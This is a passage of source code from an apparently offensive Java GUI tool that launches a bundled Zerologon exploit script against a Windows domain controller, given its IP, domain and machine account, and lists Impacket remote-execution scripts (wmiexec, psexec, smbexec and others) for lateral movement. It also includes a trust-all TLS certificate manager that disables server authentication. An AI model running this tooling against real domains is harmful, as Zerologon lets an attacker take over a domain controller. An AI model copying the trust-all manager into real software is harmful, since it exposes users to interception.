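     * Click handler: reads the IP, domain and machine-account fields, passes them
     * with the selected charset to {@code ZerologonExec} and appends the outcome
     * to the result area. If a field is blank, a prompt is appended to that field
     * and the handler returns without calling {@code ZerologonExec}.
     */
    @FXML
    void Zerologon_clicked(MouseEvent event) {

        // Read the IP.
        String DC_IP;
        if (StrUtil.isBlank(textField_DCiP.getText())) {
            Platform.runLater(() -> {
                textField_DCiP.appendText("\n");
                textField_DCiP.appendText("请填写IP:");
            });
            return;
        }
        DC_IP = textField_DCiP.getText();

        // Read the domain.
        String Domain;
        if (StrUtil.isBlank(textField_Domain.getText())) {
            Platform.runLater(() -> {
                textField_Domain.appendText("\n");
                textField_Domain.appendText("请填写Domain:");
            });
            return;
        }
        Domain = textField_Domain.getText();

        // Read the machine account name.
        String DomainMachineName;
        if (StrUtil.isBlank(textField_DomainMachineName.getText())) {
            Platform.runLater(() -> {
                textField_DomainMachineName.appendText("\n");
                textField_DomainMachineName.appendText("请填写机器用户名:");
            });
            return;
        }
        DomainMachineName = textField_DomainMachineName.getText();

        String encoder2 = choiceBox_coder2.getValue();
        String ZeroResult = ZerologonExec(DC_IP, Domain, DomainMachineName, encoder2);
        Platform.runLater(() -> {
            textArea_ZeroResult.appendText("\n");
            // The script output is shown only when it contains "OK";
            // otherwise a fixed failure message is shown.
            if (ZeroResult.contains("OK")) {
                textArea_ZeroResult.appendText(ZeroResult);
            } else {
                textArea_ZeroResult.appendText("漏洞攻击失败");
            }

        });

    }

    /** Fills both charset choice boxes and selects the first entry in each. */
    @FXML
    public void initialize() {
        ObservableList<String> items = FXCollections.observableArrayList(coder.getKindList());
        choiceBox_coder1.setItems(items);
        choiceBox_coder1.setValue(items.get(0));

        ObservableList<String> items2 = FXCollections.observableArrayList(coder.getKindList());
        choiceBox_coder2.setItems(items2);
        choiceBox_coder2.setValue(items2.get(0));

        Platform.runLater(() -> {
            textArea_Ms17010.appendText("\n");
            textArea_Ms17010.appendText("MS17010还没找到合适的脚本,找到了填充");
        });

        // High-DPI screen adaptation.
        System.setProperty("prism.allowhidpi", "true");
    }
}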
133 |
--------------------------------------------------------------------------------
/src/main/java/utils/Http/Cert.java:
--------------------------------------------------------------------------------
1 | package utils.Http;
2 |
3 | /**
4 | * @author yhy
5 | * @date 2021/8/20 23:25
6 | * @github https://github.com/yhy0
7 | */
8 |
9 | import javax.net.ssl.X509TrustManager;
10 | import java.security.cert.X509Certificate;
11 |
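/**
 * {@link X509TrustManager} that performs no certificate validation.
 *
 * <p>SECURITY: both check methods are empty and never throw, so a TLS connection
 * built on this manager accepts every certificate chain it is shown: self-signed,
 * expired, issued for another host, or presented by an interceptor on the network
 * path. The traffic is encrypted but the peer is not authenticated. Do not reuse
 * this class where the identity of the server matters; use the platform default
 * trust manager, or pin the expected certificate, instead.
 */
public class Cert implements X509TrustManager {
    public Cert() {
    }

    /** Empty body: never throws, so every client chain is accepted. */
    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) {
    }

    /** Empty body: never throws, so every server chain is accepted. */
    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) {
    }

    /**
     * @return an empty array; the {@link X509TrustManager} contract asks for a
     *         non-null (possibly empty) array, and callers that iterate the
     *         result would fail on {@code null}
     */
    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0];
    }
}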
26 |
--------------------------------------------------------------------------------
/src/main/java/utils/Http/Response.java:
--------------------------------------------------------------------------------
1 | package utils.Http;
2 |
3 | /**
4 | * @author yhy
5 | * @date 2021/8/20 22:56
6 | * @github https://github.com/yhy0
7 | */
8 |
/**
 * Mutable value holder for the outcome of one HTTP request.
 */
public class Response {
    // Status code of the response (callers compare it with HTTP status values).
    private int code;
    // presumably the response headers, body text and error message — confirm against HttpTools
    private String head, text, error;

    /** Creates an empty response: code 0, all strings null. */
    public Response() {
    }

    /** Creates a response with every field set. */
    public Response(int code, String head, String text, String error) {
        this.code = code;
        this.head = head;
        this.text = text;
        this.error = error;
    }

    public int getCode() {
        return code;
    }

    public void setCode(int code) {
        this.code = code;
    }

    public String getHead() {
        return head;
    }

    public void setHead(String head) {
        this.head = head;
    }

    public String getText() {
        return text;
    }

    public void setText(String text) {
        this.text = text;
    }

    public String getError() {
        return error;
    }

    public void setError(String error) {
        this.error = error;
    }
}
57 |
58 |
--------------------------------------------------------------------------------
/src/main/java/utils/ImpacketPath.java:
--------------------------------------------------------------------------------
1 | package utils;
2 |
3 | import java.io.*;
4 | import java.nio.charset.StandardCharsets;
5 | import java.util.Arrays;
6 |
/**
 * Relative paths of Impacket example scripts under ./impacket/examples.
 *
 * NOTE(review): the fields are public, static and non-final, so any code in the
 * application can reassign them.
 */
public class ImpacketPath {


    public static String Wmixexec = "./impacket/examples/wmiexec.py"; // usage: wmiexec.py username:password@targetIP whoami
    public static String Psexec = "./impacket/examples/psexec.py";
    public static String SMBexec = "./impacket/examples/smbexec.py";
    public static String Atexec = "./impacket/examples/atexec.py";
    public static String DCOMexec = "./impacket/examples/DCOMexec.py";

}
17 |
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/src/main/java/utils/Kinds_Coder.java:
--------------------------------------------------------------------------------
1 | package utils;
2 |
3 | import java.util.ArrayList;
4 |
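/**
 * Holds the list of charset names offered in the UI.
 */
public class Kinds_Coder {
    // Type argument restored: only strings are ever added to the list.
    private ArrayList<String> Coderlist;

    /**
     * Constructor: initialises the list.
     */
    public Kinds_Coder() {
        this.coders();
    }

    /**
     * Replaces the stored list with a fresh one holding the three charset names.
     *
     * @return the newly created list (the same instance {@link #getKindList()} returns afterwards)
     */
    public ArrayList<String> coders() {
        Coderlist = new ArrayList<>();
        Coderlist.add("UTF-8");
        Coderlist.add("GBK");
        Coderlist.add("UTF-16");
        return Coderlist;
    }

    /**
     * @return the stored list itself, not a copy; changes made by the caller are
     *         visible to every other user of this object
     */
    public ArrayList<String> getKindList() {
        return Coderlist;
    }

}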
28 |
--------------------------------------------------------------------------------
/src/main/java/utils/Zerologon.java:
--------------------------------------------------------------------------------
1 | package utils;
2 |
3 | import java.io.BufferedReader;
4 | import java.io.IOException;
5 | import java.io.InputStreamReader;
6 |
/**
 * Runs the bundled zerologon-Shot.py script as a child process and returns what
 * it wrote to standard output.
 */
public class Zerologon {
    // Relative script path handed to the "python" executable.
    public static String zerologon = "impacket/examples/zerologon-Shot/zerologon-Shot.py";

    /**
     * Starts the script with the given values and collects its standard output.
     *
     * @param Dc_ip             value used both in the target argument and after "-dc-ip"
     * @param Domain            value placed before the "/" in the target argument
     * @param DomainMachineName value placed between the "/" and the "@" in the target argument
     * @param encoder           charset name used to decode the child's standard output
     * @return the non-empty output lines, each followed by a newline; if an
     *         IOException or InterruptedException occurs, the stack trace is printed
     *         and whatever was collected so far is returned
     */
    public static String ZerologonExec(String Dc_ip, String Domain, String DomainMachineName, String encoder) {
        StringBuilder output = new StringBuilder();
        try {
            String[] commandArgs = {"python", zerologon, Domain + "/" + "'" + DomainMachineName + "'" + "@" + Dc_ip, "-dc-ip", Dc_ip};
            String command = String.join(" ", commandArgs); // join the arguments into one string (used only for the log line below)
            System.out.println("Command: " + command); // print the command being executed
            // Array form of exec(): each element is handed to the child as one argument; no shell parses it.
            Process process = Runtime.getRuntime().exec(commandArgs);
            // Only standard output is read here; standard error is not consumed.
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream(), encoder));
            String line;
            while ((line = reader.readLine()) != null) {
                if (line.equals("")) {
                    continue; // skip empty lines
                }
                output.append(line).append("\n");
            }

            int exitCode = process.waitFor();
            System.out.println("Exit Code: " + exitCode);
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
        return output.toString();
    }

}
35 |
--------------------------------------------------------------------------------
/src/main/resources/css/main.css:
--------------------------------------------------------------------------------
1 | /* 修改Tab中背景颜色*/
2 | .jfx-tab-pane .headers-region {
3 | -fx-background-color: #fff;
4 | }
5 |
6 | .jfx-tab-pane .tab-header-background {
7 | -fx-background-color: #fff;
8 | }
9 |
10 | /* 修改Tab中文本的颜色 */
11 | .tab-label {
12 | -fx-text-fill: #383838;
13 | -fx-font-family: Arial, 'Microsoft YaHei'
14 | }
15 |
16 | /* 子代选择器,Tab选中的时候选择其子元素tab-label */
17 | /*.tab:selected .tab-label {*/
18 | /* -fx-text-fill: #FF0088;*/
19 | /*}*/
20 | .tab:selected .tab-label {
21 | -fx-text-fill: #251eff;
22 | }
--------------------------------------------------------------------------------
/src/main/resources/fxml/DCgo.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/fxml/Main.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/test/java/org/example/AppTest.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import junit.framework.Test;
4 | import junit.framework.TestCase;
5 | import junit.framework.TestSuite;
6 |
/**
 * Placeholder unit test generated with the project skeleton.
 */
public class AppTest extends TestCase {
    /**
     * Creates the test case.
     *
     * @param testName name of the test case
     */
    public AppTest(String testName) {
        super(testName);
    }

    /**
     * @return a suite containing the tests of this class
     */
    public static Test suite() {
        return new TestSuite(AppTest.class);
    }

    /**
     * Always passes; it exercises no application code.
     */
    public void testApp() {
        assertTrue(true);
    }
}
39 |
--------------------------------------------------------------------------------
/文档.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/文档.pdf
--------------------------------------------------------------------------------